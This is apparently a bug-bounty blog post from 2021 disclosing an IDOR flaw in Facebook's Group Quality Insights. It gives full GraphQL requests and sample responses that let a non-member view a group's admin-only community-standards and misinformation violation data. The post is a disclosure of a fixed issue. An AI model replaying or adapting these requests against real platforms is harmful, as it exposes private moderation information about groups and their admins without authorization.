Wednesday, April 14, 2021

Facebook Bug POC - Group Quality Insight


Group Quality Insights - Information of what/when/why Community standards are violated in a group (Includes False News).

Who can see this info - ONLY GROUP ADMINS (Mods excluded).

Couple of GraphQL calls giving some contextual responses to a non-member for a Closed and Public group -

Report - 1

Request goes to -

POST /graphql HTTP/1.1
Host: graph.facebook.com

doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"community_standards\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}

The response for this request will say -

"Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled."

Request to get False news violations -

POST /graphql HTTP/1.1
Host: graph.facebook.com

doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"misinformation\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}

The response is -

"No Recent False News in Your Group" (I couldn't find how to make a false news post in a Group)

Report 2 -

Request body -

POST /graphql HTTP/1.1

doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables=%7B%22params%22%3A%7B%22path%22%3A%22%2Fgroups%2Fviolations%2Fdashboard%2F%22%2C%22params%22%3A%22%7B%5C%22group_id%5C%22%3A22TARGET_GROUP_ID%7D%22%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22extra_client_data%22%3A%7B%7D%7D%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22scale%22%3A%221%22%7D&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=%5B%22GraphServices%22%5D&server_timestamps=true

The response will be 200 OK and additional info which will show the count of "Community Standard Violations 19 violations"

Another request states the role who made the violations -

POST /api/graphql/ HTTP/1.1
Host: www.facebook.com

av=MY_USER_ID&__user=MY_USER_ID&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables=%7B%22groupID%22%3A%22TARGET_GROUP_ID%22%7D&doc_id=2061462663959034

Contextual response -

If the Admins have broken Community standards -

"violations_queue_name": "Admin breaches have put your group at risk",
"violations_queue_subtitle": "Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled.",
"violations_queue_state": "ADMIN_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,

If no Violations -

"violations_queue_name": "No breaches to show",
"violations_queue_subtitle": "If members of your group post content that breaches certain Community Standards, we'll tell you about it here.",
"violations_queue_state": "NO_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,

After the fix of this issue, there was another endpoint going through web UI was vulnerable for IDOR. I updated the report to get it fixed as well.